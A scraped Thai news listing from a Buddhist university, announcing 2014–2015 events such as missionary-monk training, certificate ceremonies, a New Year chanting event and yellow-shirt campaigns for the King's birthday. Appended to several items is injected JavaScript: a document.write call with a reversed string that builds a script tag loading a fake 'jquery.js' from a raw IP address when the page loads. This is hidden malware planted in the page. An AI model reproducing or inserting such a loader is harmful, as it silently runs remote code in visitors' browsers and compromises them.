เปิดโครงการอบรมพระธรรมทูตสายต่างประเทศ รุ่นที่ ๒๑ ประจำปี ๒๕๕๘

เปิดโครงการอบรมพระธรรมทูตสายต่างประเทศ รุ่นที่ ๒๑ ประจำปี ๒๕๕๘            เมื่อวันที่ ๕ มีนาคม ๒๕๕๘ เวลา ๙.๓๐ น. ศาสตราจารย์พิเศษ ดร. สมเด็จพระพุทธชินวงศ์ (สมศักดิ์ อุปสโม) เจ้าคณะใหญ่หนกลาง เปิดโครงการอบรมพระธรรมทูตสายต่างประเทศ รุ่นที่ ๒๑ จำนวน ๑๐๒ รูป...

พิธีมอบประกาศนียบัตร หลักสูตรประกาศนียบัตร(ป.บส) , (ป.ทส)

พิธีมอบประกาศนียบัตร หลักสูตรประกาศนียบัตรการบริหารกิจการคณะสงฆ์ (ป.บส) และหลักสูตรประกาศนียบัตร วิชาการเทศนา (ป.ทส) ในวันที่ ๒๗ กุมภาพันธ์ ๒๕๕๘ ภาคเช้า เวลา ๐๙.๐๐ น. มีพระราชวรเมธี รองอธิการบดีฝ่ายบริหาร เป็นประธานในพิธีเปิด พร้อมให้โอวาท และมี พระครูปริยัติกิตติธำรง,ผศ.,ดร. คณบดีคณะสังคมศาสตร์ กล่าวถวายรายงาน จากนั้นเวลา ๑๐.๐๐ น. มีการอภิปรายเรื่อง "ศีลห้ากับการคืนความสุขให้กับสังคมไทย" ซึ่งมีตัวแทนผู้สำเร็จการศึกษาเข้าร่วมอภิปรายดำเนินรายการโดย...

พระพรหมบัณฑิต,ศ.ดร. อธิการบดี มจร ปาฐกถาพิเศษ เรื่อง “ภาษาไทยกับการเผยแผ่พระพุทธศาสนา”

ขอเชิญชวนร่วมงานกิจกรรมเสริมหลักสูตร เสวนาทางวิชาการ โดยพระพรหมบัณฑิต,ศ.ดร. อธิการบดี มจร ปาฐกถาพิเศษ เรื่อง "ภาษาไทยกับการเผยแผ่พระพุทธศาสนา" และมีการเสวนาทางวิชาการเรื่อง ศิลปะการใช้ภาษาไทยสู่เส้นทางวิชาชีพ โดย กวีซีไรต์ชื่อดัง ๒ ท่านได้เเก่ ไพวรินทร์ ขาวงาม และ แดนอรัญ แสงทอง ปิดท้ายด้วย ทศพล หิมพานต์ ศิลปินลูกทุ่งชื่อดัง เเหล่สด ในวันที่ ๒๔ กุมภาพันธ์...

พระพรหมบัณฑิต อธิการบดี มจร ได้พบปะนิสิตปฏิบัติธรรม

วันนี้ ๒๕ ธันวาคม ๒๕๕๗ เวลา ๑๓.๐๐ น. พระพรหมบัณฑิต อธิการบดี มจร ได้พบปะนิสิต และกล่าวให้โอวาทแก่นิสิตซึ่งปฏิบัติธรรมอยู่ ณ อาคารหอประชุม มวก. ๔๘ พรรษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

Cross Year Prayer Projectขอเชิญพุทธศาสนิกชน สวนมนต์ข้ามปี มจร

ขอเชิญชวนพุทธศาสนิกชนทุกท่านเข้าร่วมกิจกรรม สวดมนต์ข้ามปี วิถีไทย วิถีพุทธ ณ อุโบสถกลางน้ำ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย อำเภอวังน้อย จังหวัดพระนครศรีอยุธยา ในวันที่ ๓๑ ธันวาคม ๒๕๕๗ ตั้งเเต่เวลา ๐๘.๓๐ - ๐๐.๓๐ น. ทั้งนี้มีการจัดกิจกรรมตลอดทั้งวัน สร้างเสริมบุญบารมี  โดยกิจกรรมนี้ การท่องเที่ยวเเห่งประเทศไทย ร่วมมือกับมหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย สามารถดูกำหนดการได้ที่ คลิก!กำหนดการ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

การสั่งซื้อเสื้อเหลืองเพื่อใส่ตลอดเดือนธันวาคม

สามารถอ่านรายละเอียดการสั่งซื้อได้ที่ >>  การสั่งซื้อเสื้อเหลือง document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

รับสมัครสอบแข่งขันบุคคลเพื่อบรรจุเป็นพนักงานมหาวิทยาลัย สังกัดมหาวิทยาลัยราชภัฏเชียงใหม่

สนใจคลิกอ่านรายละเอียดเพิ่มเติมได้ที่ >>>> รับสมัครบุคลากร ราชภัฏเชียงใหม่ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

พิธีเจริญพระพุทธมนต์เฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสเฉลิมพระชนมพรรษา ๘๗ พรรษา ๕ ธันวามหาราช ประจำปี ๒๕๕๗

กำหนดการ พิธีเจริญพระพุทธมนต์เฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสเฉลิมพระชนมพรรษา ๘๗ พรรษา ๕ ธันวามหาราช ประจำปี ๒๕๕๗ วันจันทร์ที่ ๑ ธันวาคม พ.ศ. ๒๕๕๗ เวลา ๑๓.๐๐-๑๕.๐๐ น. ณ อาคาร มวก. ๔๘ พรรษา มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ตำบลลำไทร อำเภอวังน้อย จังหวัดพระนครศรีอยุธยา ------------------------ เวลา ๑๒.๓๐ น.    ผู้บริหาร คณาจารย์ เจ้าหน้าที่ นิสิตทุกรูป/คน ลงนามถวายพระพรพระบาทสมเด็จ...

ร่วมเเต่งกายด้วยเสื้อสีเหลืองตลอดเดือนธันวาคม

ขอเชิญชวนบุคลากรฝ่ายคฤหัสถ์ทุกท่านในมหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย ร่วมกันเเต่งกายด้วยเสื้อสีเหลืองตลอดเดือนธันวาคม ๒๕๕๗ เนื่องในโอกาสมหามงคลเฉลิมพระชนมพรรษาพระบาทสมเด็จพระเจ้าอยู่หัว ครบรอบ ๘๗ พรรษา ๕ ธันวาคม ๒๕๕๗ ร่วมรณรงค์โดยคณะกรรมการอำนวยการจัดงานเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว รายละรายละเอียดสามารถดาวน์โหลดได้ที่นี่ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))
X